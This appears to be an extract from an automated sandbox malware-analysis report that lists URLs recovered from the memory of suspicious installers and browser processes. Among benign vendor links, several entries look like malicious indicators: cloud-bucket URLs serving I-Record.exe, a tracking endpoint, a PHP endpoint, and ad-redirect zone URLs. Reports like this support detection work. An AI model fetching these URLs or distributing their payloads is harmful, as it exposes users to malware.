Source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp	String found in binary or memory: http://cor-tips.com/Download/corTips.exe
Source: 7((_8888YTR(.exe, 00000003.00000002.323306891.0000000000C81000.00000004.00000020.sdmp, Kixysyshysy.exe, 0000000A.00000003.358368191.000000001C15F000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.399884161.000000001C15F000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.345782334.000000001C15F000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.377691490.000000001B980000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Kixysyshysy.exe, 0000000A.00000003.358368191.000000001C15F000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.399884161.000000001C15F000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.345782334.000000001C15F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.v
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe2
Source: Kixysyshysy.exe, 0000000A.00000003.324627509.000000001C4B5000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.328427516.000000001C4DF000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.324665647.000000001C4B5000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.328359092.000000001C4DD000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.324521098.000000001C4AF000.00000004.00000001.sdmp	String found in binary or memory: http://en.w
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357535577.000001AC6067E000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352521474.000001AC60679000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352904064.000001AC60683000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354928622.000001AC60686000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.388164041.000001AC6068A000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.351896441.000001AC60673000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354428587.000001AC60684000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358440114.000001AC60685000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.391374856.000001AC6068B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359537428.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.361364428.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354772182.0000018BEE6B9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396013581.0000018BEE6CA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354616344.0000018BEE6B5000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356225093.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355581746.0000018BEE6C3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404678337.0000018BEE6CB000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356869908.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.ma)
Source: chrome.exe, 00000018.00000002.403138233.0000018BEE640000.00000004.00000020.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: chrome.exe, 00000017.00000003.377414613.000001AC60698000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.407796691.0000018BF0D90000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/
Source: ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe	String found in binary or memory: http://james.newtonking.com/projects/json
Source: 1nJGU59JPU.tmp, 00000001.00000003.335063356.0000000002214000.00000004.00000001.sdmp	String found in binary or memory: http://korolova.s3.nl-ams.scw.cloud/adv-control/I-Record.
Source: 1nJGU59JPU.tmp, 00000001.00000003.273779504.00000000021C8000.00000004.00000001.sdmp	String found in binary or memory: http://korolova.s3.nl-ams.scw.cloud/adv-control/I-Record.exe
Source: 1nJGU59JPU.tmp, 00000001.00000003.335063356.0000000002214000.00000004.00000001.sdmp	String found in binary or memory: http://korolova.s3.nl-ams.scw.cloud/adv-control/I-Record.exeL
Source: 1nJGU59JPU.tmp, 00000001.00000002.336506814.000000000018F000.00000004.00000001.sdmp	String found in binary or memory: http://mitrichsoftware.wordpress.comB
Source: 1nJGU59JPU.tmp, 00000001.00000003.335063356.0000000002214000.00000004.00000001.sdmp	String found in binary or memory: http://onepiece.s3.pl-waw.scw.cloud/pub-carousel/I-Record.exL
Source: 1nJGU59JPU.tmp, 00000001.00000003.335063356.0000000002214000.00000004.00000001.sdmp	String found in binary or memory: http://onepiece.s3.pl-waw.scw.cloud/pub-carousel/I-Record.exe
Source: 1nJGU59JPU.tmp, 00000001.00000003.335037560.0000000003975000.00000004.00000001.sdmp	String found in binary or memory: http://onepiece.s3.pl-waw.scw.cloud/pub-carousel/I-Record.exe66
Source: 1nJGU59JPU.tmp, 00000001.00000003.335037560.0000000003975000.00000004.00000001.sdmp	String found in binary or memory: http://onepiece.s3.pl-waw.scw.cloud/pub-carousel/I-Record.exeeRR
Source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp	String found in binary or memory: http://post-back-url.com/temptrack/Store
Source: ZHunuhebaqu.exe, ZHunuhebaqu.exe, 00000014.00000002.361743821.0000000000512000.00000002.00020000.sdmp	String found in binary or memory: http://productsdetails.online/Series/za3ma_za3ma.php
Source: 7((_8888YTR(.exe, 00000003.00000002.324177929.0000000002E4A000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.323595078.0000000002C01000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.microso
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357535577.000001AC6067E000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352521474.000001AC60679000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352904064.000001AC60683000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354928622.000001AC60686000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.388164041.000001AC6068A000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.351896441.000001AC60673000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354428587.000001AC60684000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358440114.000001AC60685000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.391374856.000001AC6068B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359537428.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.361364428.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354772182.0000018BEE6B9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396013581.0000018BEE6CA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354616344.0000018BEE6B5000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356225093.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355581746.0000018BEE6C3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404678337.0000018BEE6CB000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356869908.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: chrome.exe, 00000018.00000003.359537428.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.361364428.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354772182.0000018BEE6B9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396013581.0000018BEE6CA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354616344.0000018BEE6B5000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356225093.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355581746.0000018BEE6C3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404678337.0000018BEE6CB000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356869908.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/)
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/W
Source: chrome.exe, 00000017.00000003.372345068.000001AC63EC6000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092AnchorsZs
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092amsgin
Source: chrome.exe, 00000018.00000002.403646302.0000018BEE665000.00000004.00000020.sdmp	String found in binary or memory: http://vexacion.com/afu.php?zoneid=1851483
Source: chrome.exe, 00000018.00000002.403138233.0000018BEE640000.00000004.00000020.sdmp	String found in binary or memory: http://vexacion.com/afu.php?zoneid=1851483&
Source: chrome.exe, 00000018.00000002.403138233.0000018BEE640000.00000004.00000020.sdmp	String found in binary or memory: http://vexacion.com/afu.php?zoneid=1851483C:
Source: chrome.exe, 00000018.00000002.403138233.0000018BEE640000.00000004.00000020.sdmp	String found in binary or memory: http://vexacion.com/afu.php?zoneid=1851483a
Source: chrome.exe, 00000018.00000002.403138233.0000018BEE640000.00000004.00000020.sdmp	String found in binary or memory: http://vexacion.com/afu.php?zoneid=1851483leSystem
Source: chrome.exe, 00000018.00000002.403138233.0000018BEE640000.00000004.00000020.sdmp	String found in binary or memory: http://vexacion.com/afu.php?zoneid=1851483z
Source: chrome.exe, 00000019.00000002.409368234.0000020F03072000.00000004.00000001.sdmp	String found in binary or memory: http://vexacion.com/afu.php?zoneid=1851513
Source: Kixysyshysy.exe, 0000000A.00000003.327457858.000000001C4C6000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Kixysyshysy.exe, 0000000A.00000003.333500637.000000001C4B8000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.333644149.000000001C4B9000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.334577847.000000001C4B4000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.334732620.000000001C4B5000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.334244150.000000001C4B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Kixysyshysy.exe, 0000000A.00000003.332645863.000000001C4B5000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: Kixysyshysy.exe, 0000000A.00000003.332840024.000000001C4B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersK
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357535577.000001AC6067E000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352521474.000001AC60679000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352904064.000001AC60683000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354928622.000001AC60686000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.388164041.000001AC6068A000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.351896441.000001AC60673000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354428587.000001AC60684000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358440114.000001AC60685000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.391374856.000001AC6068B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359537428.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.361364428.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354772182.0000018BEE6B9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396013581.0000018BEE6CA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354616344.0000018BEE6B5000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356225093.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355581746.0000018BEE6C3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404678337.0000018BEE6CB000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356869908.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 1nJGU59JPU.tmp, 1nJGU59JPU.tmp, 00000001.00000000.273253251.0000000000401000.00000020.00020000.sdmp, irecord.exe, 0000000B.00000003.319755583.0000000002178000.00000004.00000001.sdmp, irecord.exe, 0000000B.00000003.319474585.00000000022A0000.00000004.00000001.sdmp, irecord.tmp, 0000000C.00000000.321315901.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357535577.000001AC6067E000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352521474.000001AC60679000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352904064.000001AC60683000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354928622.000001AC60686000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.388164041.000001AC6068A000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.351896441.000001AC60673000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354428587.000001AC60684000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358440114.000001AC60685000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.391374856.000001AC6068B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359537428.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.361364428.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354772182.0000018BEE6B9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396013581.0000018BEE6CA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354616344.0000018BEE6B5000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356225093.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355581746.0000018BEE6C3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404678337.0000018BEE6CB000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356869908.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: chrome.exe, 00000018.00000003.359537428.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.361364428.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354772182.0000018BEE6B9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396013581.0000018BEE6CA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354616344.0000018BEE6B5000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356225093.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355581746.0000018BEE6C3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404678337.0000018BEE6CB000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356869908.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome=
Source: chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeob
Source: chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357535577.000001AC6067E000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352521474.000001AC60679000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352904064.000001AC60683000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354928622.000001AC60686000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.388164041.000001AC6068A000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.351896441.000001AC60673000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354428587.000001AC60684000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358440114.000001AC60685000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.391374856.000001AC6068B000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome~
Source: 1nJGU59JPU.exe, 1nJGU59JPU.exe, 00000000.00000000.271577145.0000000000401000.00000020.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324177929.0000000002E4A000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.323595078.0000000002C01000.00000004.00000001.sdmp, irecord.exe, 0000000B.00000000.317578537.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: 1nJGU59JPU.exe, 00000000.00000000.271577145.0000000000401000.00000020.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324177929.0000000002E4A000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.323595078.0000000002C01000.00000004.00000001.sdmp, irecord.exe, 0000000B.00000000.317578537.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 1nJGU59JPU.exe, 00000000.00000003.271891331.0000000002570000.00000004.00000001.sdmp, 1nJGU59JPU.exe, 00000000.00000003.272027551.0000000002460000.00000004.00000001.sdmp, 1nJGU59JPU.tmp, 1nJGU59JPU.tmp, 00000001.00000000.273253251.0000000000401000.00000020.00020000.sdmp, irecord.exe, 0000000B.00000003.319755583.0000000002178000.00000004.00000001.sdmp, irecord.exe, 0000000B.00000003.319474585.00000000022A0000.00000004.00000001.sdmp, irecord.tmp, 0000000C.00000000.321315901.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: 1nJGU59JPU.exe, 00000000.00000003.271891331.0000000002570000.00000004.00000001.sdmp, 1nJGU59JPU.exe, 00000000.00000003.272027551.0000000002460000.00000004.00000001.sdmp, 1nJGU59JPU.tmp, 00000001.00000000.273253251.0000000000401000.00000020.00020000.sdmp, irecord.exe, 0000000B.00000003.319755583.0000000002178000.00000004.00000001.sdmp, irecord.exe, 0000000B.00000003.319474585.00000000022A0000.00000004.00000001.sdmp, irecord.tmp, 0000000C.00000000.321315901.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: Kixysyshysy.exe, 0000000A.00000003.323842399.000000001C4AF000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.323390940.000000001C4AF000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
